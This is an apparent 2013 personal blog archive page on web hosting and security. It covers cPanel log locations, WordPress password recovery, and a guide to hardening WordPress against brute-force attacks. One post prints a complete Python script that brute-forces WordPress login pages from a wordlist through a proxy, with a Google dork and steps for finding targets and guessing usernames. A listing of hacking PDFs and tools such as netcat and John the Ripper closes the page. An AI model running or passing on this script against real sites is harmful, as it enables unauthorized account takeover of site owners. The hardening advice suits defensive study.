Thursday, May 16, 2013

Pagination Full Example PHP - MYSQL

Code : http://pastebin.com/PKdbyT0A
Database for mysql :http://downloads.mysql.com/docs/world_innodb.sql.zip





Posted by at 1 comment:
Labels: ,

Friday, May 10, 2013

Locations of Common Log Files on cPanel Servers

Apache
Apache is the web server that is typically utilized by cPanel.  On cPanel servers Apache does write to a rather high number of logs as each site has its own traffic log.

The access_log is used to log all http requests to ether the hostname of the server, requests directed at the servers IPs, or sites that resolve to the server but are no longer hosted on it.

On cPanel servers all Apache errors, regardless of site, are logged in the error_log.




Within the domlogs folder each site on the server will have its own log file.  These files will be the fully qualified domain name for the domain, ie domain.com, liquidweb.com.  All http traffic to a site will be logged in this log file.

Exim
Exim is the MTA(Mail Transfer Agent) that cPanel utilizes.  Exim has three primary logs, but only two of these logs contain useful information

The exim_mainlog contains ALL interactions that exim handles, so both incoming and outgoing mail transactions.

The exim_rejectlog contains all connection attempts that were denied.  This information is also logged in the exim_mainlog.
For more information on Exim’s logs try a Google search for “Exim Cheat Sheet”.

cPanel
Cpanel does log all http traffic to WHM, webmail, and cPanel access.  All cPanel logs are located in the /usr/local/cpanel/logs directory.

This access_log contains all traffic to WHM, cPanel, and webmail over http.
This error_log contains all errors that occur when accessing a cPanel related site over http or https.

FTP
Regardless of FTP deamon in use, cPanel does log connections, uploads, and downloads.  However, FTP does not have its own log file it is instead threaded into the systemside messages log file.

All FTP transactions are recorded in messages.  They are however interwoven with all over system messages that are logged in this file.
Posted by at 1 comment:
Labels: ,

Wordpress admin password recovery methods

Method 1 - Through FTP
There is also an easy way to reset your password via FTP, if you're using the admin user.

1. Login to your site via FTP and download your active theme's functions.php file.

2. Edit the file and add this code to it, right at the beginning, after the first
wp_set_password('password',1);

Put in your own new password for the main admin user. The "1" is the user ID number in the wp_users table.

3. Upload the modified file back to your site.

4. After you then are able to login, make sure to go back and remove that code. It will reset your password on every page load until you do.
Wordpress MD5 Genarator :http://www.insidepro.com/hashes.php


Method 2 -Run This PHP Script :)


 Save this script in your web server with any name and run it :) Thats all

Posted by at No comments:
Labels:

Friday, May 3, 2013

How to stop wordpress brute force attack


1. Use a strong password

Minimum password recommendations:

- At least 8 characters total
- Mixture of upper and lower-case letters
- Numbers, punctuation or other non-alphanumeric characters

Example weak password: secret1
Improved strong password: Z#hupsZ2M4!Z

2. Change default WordPress admin username

When installing WordPress by default the administrator user has the username of admin.

The botnet attack is currently only targeting this default username, so even having an administrator username of admin123 could signifiantly reduce the likilhood of your site being succesfully logged into by a malicious user.

3. Lock down WordPress admin access with .htaccess

Utilizing a WordPress brute force plugin for this type of attack is not very efficient, and in some cases can actually lead to your site becoming unavailable due to the large amount of processing power used to attempt to challenge each and every malicious login attempt.

Instead you should rely on the information we have on how to lock down WordPress admin login with .htaccess.

Setup a secondary level password to prevent unauthorized WordPress wp-admin and wp-login.php attempts.



4. Temporaily disable CPU intensive login limit plugins

Blocking this attack with .htaccess rules is the preferred method, as login limiting plugins can not only lead to issue with triggering our own internal security rules, but they also will not be effective in this type of large scale attack.

5. Scan website for hacks, check Google Safe Browsing

If your WordPress site had been successfully compromised, a clear indication will usually be found either by a surface security scan of the website, or it will also get reported to Google's Safe Browsing.

Scan your website with an online malware scanner like sitecheck.sucuri.net/scanner

Check Google's safe browsing for your domain, at google.com/safebrowsing/diagnostic?site=example.com

6. Setup CloudFlare DNS level protection

Due to the large scale of this botnet attack, CloudFlare has offered DNS level filtering for this attack on all of their free accounts.

While probably not an ideal solution if you have many WordPress sites due to having to update the name servers for each domain, and then waiting typically 24-36 hours for DNS propagation. Single site owners might benefit greatly from this type of protection which should block the botnet requests from even making it to the server in the first place.

7. Backup WordPress

At this point it's probably a good idea to backup WordPress just in case. That way, as the attacks continue, you're ensured that you always have a good point to restore back to in the event something goes bad.

Backing up your data

    Backup your website files in cPanel
    Backup your database in cPanel

Restoring your data

    Restore your website files in cPanel
    Restore your database in cPanel

8. Update everything WordPress

To protect yourself from any known exploits to WordPress you should update everything related to WordPress:

Necessary updates to make:

    Update WordPress from admin dashboard
    Update WordPress theme
    Update WordPress plugin

9. Clean up hacks

If your website has been the victim of a hack, you can follow my guide on how to reinstall WordPress after a hack for steps on cleaning it up and getting back in business.

10. Other general WordPress recommendations

    Optimizing WordPress with W3 Total Cache plugin
    Log out of WordPress admin dashboard when not in use
    Limit or disable WordPress revisions
    Disable WordPress autosave
    Install and use Better Delete Revision WordPress plugin

Hopefully your WordPress website should be locked down and secure now, which should help prevent our own internal security rules from blocking your own access to your WordPress admin.

If you're blocked out of your own account and were directed to this article via a warning message be sure that you followed step #3 Lock down WordPress admin access with .htaccess in order to regain access.

source : http://www.inmotionhosting.com/support/news/general/wp-login-brute-force-attack
Posted by at No comments:
Labels: ,

WordPress Brute Force Attack Script

The information is to be used for educational purposes only. I’m not responsible for any misuse of this information. The following is meant to help you develop a cracking defensive attitude to prevent such attacks. In no way should you use this information to cause any kind of damage directly or indirectly.

 I started writing a Python script for brute forcing WordPress’ login page. Then I found this script by PuRiCeL.

 



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/python
# WordPress Brute Force (wp-login.php)
# originally from http://rstcenter.com/forum/31831-%5Bpython%5D-wordpress-brute-force.rst
# example usage: nohup python wp-brute.py <site> <user> <wordlist> -verbose&

# If cookies enabled brute force will not work (yet)
# Change response on line 97 if needed. (language)

# Dork: inurl:wp-login.php

import urllib2
import sys
import re
import urllib
import httplib
import socket


if len(sys.argv) not in [4,5,6,7]:
    print 'Usage: python wordpressbf.py <site> <user> <wordlist> <options>\n'
    print '\t   -p/-proxy <host:port> : Add proxy support'
    print '\t   -v/-verbose : Verbose Mode\n'
    sys.exit(1)

for arg in sys.argv[1:]:
    if arg.lower() == '-p' or arg.lower() == '-proxy':
        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == '-v' or arg.lower() == '-verbose':
        verbose = 1

try:
    if proxy:
        print '\n * Testing Proxy...'
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print '* Proxy:', proxy

except(socket.timeout):
    print '\n[-] Proxy Timed Out'
    proxy = 0
except(NameError):
    print '\n[-] Proxy Not Given'
    proxy = 0
except:
    print '\n[-] Proxy Failed'
    proxy = 0

try:
   if verbose == 1:
      print '* Verbose Mode On\n'

except(NameError):
    print '[-] Verbose Mode Off\n'
    verbose = 0

if sys.argv[1][:7] != 'http://':
    host = 'http://' + sys.argv[1]
else:
    host = sys.argv[1]

print '* BruteForcing:', host

print '* User:', sys.argv[2]


try:
    words = open(sys.argv[3], 'r').readlines()
    print '* Words Loaded:', len(words), '\n'

except(IOError):
    print '[-] Error: Check your wordlist path\n'
    sys.exit(1)

for word in words:
    word = word.replace('\r','').replace('\n','')
    login_form_seq = [
        ('log', sys.argv[2]),
        ('pwd', word),
        ('rememberme', 'forever'),
        ('wp-submit', 'Login >>'),
        ('redirect_to', 'wp-admin/')]
    login_form_data = urllib.urlencode(login_form_seq)
    if proxy != 0:
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        opener = urllib2.build_opener(proxy_handler)
    else:
        opener = urllib2.build_opener()
    try:
        site = opener.open(host, login_form_data).read()
    except(urllib2.URLError), msg:
        print msg
        site = ''

    if re.search('WordPress requires Cookies', site):
        print '[-] Failed: WordPress has cookies enabled\n'
        sys.exit(1)

    #Change this response if different. (language)
    if re.search('<strong>ERROR</strong>',site) and verbose == 1:
        print '[-] Login Failed:', word
    else:
        print '\n\t[!] Login Successfull:', sys.argv[2],word,'\n'
        sys.exit(1)

print '\n[-] Brute Complete\n'


And here’s an example wordlist.
Here’s how to use the script.
  1. Find the login url. It usually ends in wp-login.php. You can Google dork it with inurl:wp-login.php
  2. Guess a valid username. “admin” is a common one. Variations on the name of the webmaster might also work.
  3. Run python wp-brute.py
This brute force attack only works on self-hosted WordPress sites. Those hosted on wordpress.com will lock you out if you try too many times. Step 2 above is possible because WordPress shows different error messages for invalid usernames and invalid passwords. This basic security flaw lets crackers know what usernames are valid.
Here are ways to prevent WordPress from getting hacked:


1
add_filter('login_errors',create_function('$a', "return null;"));
More Script On  ; http://nmap.org/nsedoc/scripts/http-wordpress-brute.html

Source: http://www.davidxia.com/2011/08/wordpress-brute-force-attack-script/
Posted by at No comments:
Labels: ,

Amazing Lasers! - Laser Flashlight Hack!

This is nice tutorial to make laser flashlight from Youtube :) 


Posted by at No comments:
Labels:

Lot of hacking tutorial PDF's & Tools Download

HACKING TUTORIAL PDF'S

[ ]arp_spoofing_intro.pdf30-May-2005 19:08 29K
[ ]arp_spoofing_slides.pdf30-May-2005 19:08 124K
[ ]buffer_overruns.pdf30-May-2005 19:09 663K
[ ]cheating_chap.pdf30-May-2005 19:09 477K
[ ]cross-site_tracing.pdf30-May-2005 19:10 774K
[ ]crt_optical_tempest.pdf30-May-2005 19:10 400K
[ ]ddos_attacks_info.pdf30-May-2005 19:10 98K
[ ]etherleak_report.pdf30-May-2005 19:11 282K
[ ]fingerprint_scanners.pdf30-May-2005 19:13 1.2M
[ ]optical_tempest.pdf30-May-2005 19:12 346K
[ ]session_fixation.pdf30-May-2005 19:12 356K
[ ]ssh-timing.pdf30-May-2005 19:13 362K
[ ]wep_analysis.pdf30-May-2005 19:13 148K
[ ]wireless-ids.pdf30-May-2005 19:13 38K
[ ]wireless_auditing.pdf30-May-2005 19:13 113K
[ ]wlan_macspooof_detection.pdf30-May-2005 19:13 79K



[ ]arp_spoofing_intro.pdf30-May-2005 18:09 29K
[ ]arp_spoofing_slides.pdf30-May-2005 18:10 124K
[ ]atstake_etherleak_report.pdf30-May-2005 18:10 282K
[ ]atstake_gprs_security.pdf30-May-2005 18:10 132K
[ ]atstake_war_nibbling.pdf30-May-2005 18:12 668K
[ ]buffer_overruns.pdf30-May-2005 18:13 663K
[ ]cd_lifetime_study_nist.pdf30-May-2005 18:14 654K
[ ]cheating_chap.pdf30-May-2005 18:14 477K
[ ]coca-cola_evs2_programming.pdf30-May-2005 18:15 76K
[ ]ddos_attacks_info.pdf30-May-2005 18:15 98K
[ ]ddos_attacks_surviving.pdf30-May-2005 18:15 90K
[ ]defeating_encryption.pdf30-May-2005 18:16 491K
[ ]disclosure_helps_security.pdf30-May-2005 18:17 511K
[ ]disk_sanitization_practices.pdf30-May-2005 18:19 882K
[ ]dns_cache_snooping.pdf30-May-2005 18:17 127K
[ ]dos_via_algorithmic_complexity_attack.pdf30-May-2005 18:17 263K
[ ]encryption_flaws_no_risk.pdf30-May-2005 18:17 27K
[ ]ethereal_guide.pdf30-May-2005 18:26 2.5M
[ ]fbi_codis.pdf30-May-2005 18:26 2.5M
[ ]fiber_optic_taps.pdf30-May-2005 18:20 327K
[ ]finding_hidden_cameras.pdf30-May-2005 18:21 258K
[ ]forensic_guide_to_linux.pdf30-May-2005 18:31 2.7M
[ ]google_file_system.pdf30-May-2005 18:26 269K
[ ]hacking_coke_machines.pdf30-May-2005 18:26 8.0K
[ ]how_to_own_the_internet.pdf30-May-2005 18:27 313K
[ ]iis_security_countermeasures.pdf30-May-2005 18:39 4.3M
[ ]im_cultural_divide.pdf30-May-2005 18:29 704K
[ ]information_warfare_book.pdf30-May-2005 18:34 1.9M
[ ]internet_chatroom_surveillance.pdf30-May-2005 18:31 161K
[ ]intro_to_shellcoding.pdf30-May-2005 18:32 253K
[ ]ip_v5_cookbook.pdf30-May-2005 18:36 1.1M
[ ]lamo_charges.pdf30-May-2005 18:36 333K
[ ]layer2sniffing.pdf30-May-2005 18:36 121K
[ ]liberty_disappeared_from_cyberspace.pdf30-May-2005 18:37 174K
[ ]linux_userguide.pdf30-May-2005 18:48 4.5M
[ ]magstripe_interfacing.pdf30-May-2005 18:37 66K
[ ]md5_cryptographics_weakness.pdf30-May-2005 18:37 56K
[ ]microsoft_security_poster1.pdf30-May-2005 18:39 401K
[ ]microsoft_security_poster2.pdf30-May-2005 18:40 433K
[ ]microsoft_security_poster3.pdf30-May-2005 18:40 323K
[ ]mitm_bluetooth_attack.pdf30-May-2005 18:41 73K
[ ]msoffice_encryption_insecure.pdf30-May-2005 18:41 143K
[ ]ngs_passive_information_gathering.pdf30-May-2005 18:46 1.6M
[ ]nhtcu_computer_evidence_guide.pdf30-May-2005 18:43 431K
[ ]nist_info-sec.pdf30-May-2005 18:44 282K
[ ]nist_macosx_secuity_guide.pdf30-May-2005 18:51 3.1M
[ ]nist_pda_forensics.pdf30-May-2005 18:51 2.4M
[ ]nist_security_metrics_guide.pdf30-May-2005 18:49 569K
[ ]nist_voip_security.pdf30-May-2005 18:52 1.2M
[ ]nmap_host_discovery.pdf30-May-2005 18:51 110K
[ ]nsa_interview.pdf30-May-2005 18:51 87K
[ ]opensource_security_testing.pdf30-May-2005 18:56 2.1M
[ ]optical_tempest_crt.pdf30-May-2005 18:52 400K
[ ]optical_tempest_optical.pdf30-May-2005 18:52 374K
[ ]organisations_communication_structure.pdf30-May-2005 18:53 269K
[ ]owasp_guide.pdf30-May-2005 18:54 950K
[ ]paper_dtmf.pdf30-May-2005 18:53 185K
[ ]php_security.pdf30-May-2005 18:54 249K
[ ]physical_device_fingerprinting.pdf30-May-2005 19:13 9.9M
[ ]physical_security.pdf30-May-2005 18:55 529K
[ ]rfid_analysis.pdf30-May-2005 18:56 274K
[ ]safelocks_for_compscientist.pdf30-May-2005 19:01 2.6M
[ ]sanctuminc_http_attacks.pdf30-May-2005 18:56 159K
[ ]sans_attacking_dns_protocol.pdf30-May-2005 18:57 322K
[ ]securing_your_laptop.pdf30-May-2005 18:58 345K
[ ]security_first_responders_guide.pdf30-May-2005 19:00 874K
[ ]security_through_obscurity.pdf30-May-2005 19:00 64K
[ ]session_fixation.pdf30-May-2005 19:01 356K
[ ]sessionid_brute_force.pdf30-May-2005 19:01 483K
[ ]shatter_attack.pdf30-May-2005 19:01 179K
[ ]shatter_attack_redux.pdf30-May-2005 19:03 716K
[ ]skype_protocol.pdf30-May-2005 19:02 279K
[ ]snort_install_guide_fedora2.pdf30-May-2005 19:03 345K
[ ]ssh_timing_attack.pdf30-May-2005 19:04 362K
[ ]surveillance_nation1.pdf30-May-2005 19:04 755K
[ ]surveillance_nation2.pdf30-May-2005 19:05 513K
[ ]underground_book.pdf30-May-2005 19:07 1.2M
[ ]unix_rootkits_overview.pdf30-May-2005 19:06 403K
[ ]us_frequency_chart.pdf30-May-2005 19:07 102K
[ ]usdoj_forensics_guide.pdf30-May-2005 19:07 678K
[ ]wep_analysis.pdf30-May-2005 19:07 148K
[ ]wlan_ids.pdf30-May-2005 19:07 38K
[ ]wlan_macspooof_detection.pdf30-May-2005 19:07 79K
[ ]worm_propogation.pdf30-May-2005 19:08 254K
[ ]xss_anatomy.pdf30-May-2005 19:08 41K


PERL SCRIPTS
[TXT]anti_spam.txt30-May-2005 19:13 1.9K
[TXT]apache_log_view.txt30-May-2005 19:13 9.1K
[TXT]binary_conv.txt30-May-2005 19:13 2.1K
[TXT]cgi_honeypot.txt30-May-2005 19:13 1.7K
[ ]chat.zip30-May-2005 19:13 11K
[TXT]cmd_log.txt30-May-2005 19:13 45K
[TXT]console.pl30-May-2005 19:13 12K
[TXT]cron_comp.txt30-May-2005 19:13 7.2K
[TXT]downloader.txt30-May-2005 19:13 478
[TXT]envvars_show.txt30-May-2005 19:13 325
[TXT]file_downloader.txt30-May-2005 19:13 737
[TXT]govmilhits_php.txt30-May-2005 19:13 1.2K
[TXT]html_getter.txt30-May-2005 19:13 423
[TXT]ip_resolver.txt30-May-2005 19:13 5.3K
[TXT]irc_chat_bot.txt30-May-2005 19:13 7.0K
[TXT]irc_chat_bot_text.txt30-May-2005 19:13 3.6K
[TXT]md5hash_database.txt30-May-2005 19:13 9.8K
[TXT]messenger_interface.txt30-May-2005 19:13 4.9K
[TXT]net_send_ips.txt30-May-2005 19:13 1.0K
[TXT]pinger.txt30-May-2005 19:13 1.0K
[ ]random_avatar.zip30-May-2005 19:13 17K
[TXT]referer_set1.txt30-May-2005 19:13 292
[TXT]referer_set2.txt30-May-2005 19:14 3.1K
[TXT]referer_spam.txt30-May-2005 19:14 1.5K
[ ]remote_ftplcommand.zip30-May-2005 19:14 5.5K
[ ]rootboard.zip30-May-2005 19:14 38K
[TXT]shell.txt30-May-2005 19:14 5.5K

WIN32 TOOLS


[ ]cryptcat_v1.0.0.zip13-Mar-2006 18:11 116K
[ ]ettercap_v0.6.9.exe13-Mar-2006 18:16 2.2M
[ ]john_v1.6.zip13-Mar-2006 18:13 763K
[ ]netcat_v1.1.zip13-Mar-2006 18:13 94K
[ ]nmapwin_v1.3.1.exe13-Mar-2006 18:17 4.8M
[ ]spade_v1.14.exe13-Mar-2006 18:13 1.8M
[ ]windump_v3.8.exe13-Mar-2006 18:11 388K
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)